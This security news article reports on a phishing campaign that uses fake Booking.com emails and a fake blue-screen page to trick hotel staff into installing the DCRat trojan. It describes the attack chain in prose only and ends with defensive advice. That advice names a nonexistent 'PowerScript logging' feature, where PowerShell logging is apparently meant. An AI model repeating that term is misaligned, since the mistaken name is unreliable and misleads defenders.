Beware: Fake Booking.com Emails and BSODs Target Hotels

A sophisticated malware campaign is targeting the European hospitality industry, using convincing fake emails from Booking.com to deliver a dangerous remote access trojan. Security researchers have identified a threat actor, suspected to be Russian in origin, that is luring hotel staff with fraudulent reservation alerts. The emails cleverly mimic legitimate booking notifications, complete with details like room charges in euros, making them highly effective at bypassing initial scrutiny. This social engineering attack ultimately deploys the DCRat malware, which can steal sensitive data and provide attackers with persistent control over infected systems.

The attack begins with a phishing email designed to look like a Booking.com reservation cancellation alert. The message includes a “See Details” button that redirects the recipient to a cloned version of the real Booking.com website. Once on this fake site, a JavaScript pop-up appears, claiming the page is loading slowly and prompting the user to click a refresh button. This action triggers the browser to enter full-screen mode, displaying a realistic but entirely fake Windows Blue Screen of Death (BSOD).

This counterfeit error screen provides “recovery instructions” that guide the victim into opening the Windows Run dialog. The user is then told to paste and execute a specific, malicious PowerShell command. While this command opens a decoy Booking.com admin page in the browser to maintain the illusion, it secretly works in the background. It downloads a harmful project file and uses the trusted Windows Microsoft Build Engine (MSBuild.exe) to compile and run it. This technique, known as “living off the land,” helps the malware evade detection by leveraging legitimate system tools.

The executed project file has a critical first task: it attempts to disable Windows Defender to prevent the security software from noticing the next stage. If the computer is running in Standard User mode, the file will repeatedly trigger User Account Control (UAC) prompts, asking for administrative privileges. Once granted, or if the machine is already in Admin mode, the final payload is delivered. The DCRat malware is downloaded and executed, and an Internet Shortcut is placed in the user’s Startup folder to ensure the infection reactivates with every login.

DCRat is a powerful and invasive tool for attackers. It provides capabilities for keylogging, stealing credentials, dropping additional malicious software, and maintaining remote access to the compromised computer. This allows threat actors to potentially steal financial information, guest data, and other sensitive material from hospitality businesses.

This campaign represents an evolution in tactics. Earlier versions used simpler methods involving HTML Application (.hta) files, which were easier for security software to catch. The shift to using MSBuild.exe demonstrates a strategic move toward more stealthy, fileless techniques that are harder to detect. The social engineering element, often called the “ClickFix” technique, has proven highly successful at tricking users into initiating the infection chain themselves.

To defend against such threats, organizations are advised to take several proactive steps. Employee education is paramount, specifically training staff to recognize sophisticated phishing attempts and fake error messages. IT teams should monitor trusted system processes like MSBuild.exe for unusual activity, such as connections to suspicious external servers. Additionally, enabling PowerScript logging and watching for the creation of unexpected files in system directories or Internet Shortcuts in startup folders can provide early warning signs of a compromise.

(Source: HelpNet Security)